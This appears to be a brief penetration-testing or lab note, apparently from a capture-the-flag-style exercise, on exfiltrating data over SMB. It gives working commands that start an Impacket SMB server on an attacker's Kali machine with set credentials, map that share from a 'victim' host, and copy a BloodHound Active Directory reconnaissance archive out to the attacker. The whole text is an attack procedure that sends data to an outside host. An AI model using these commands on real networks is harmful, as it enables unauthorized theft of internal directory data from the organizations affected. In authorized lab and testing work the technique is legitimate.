# On my Kali Box
smbserver.py -smb2support share /tmp/smb -username wasabi -password wasabi123
# On the victim
net use \\10.10.11.12\share /u:wasabi wasabi123
# Now we can copy the files from the victim to our Kali box
copy XXXXXXX_Bloodhound.zip \\10.10.11.12\share\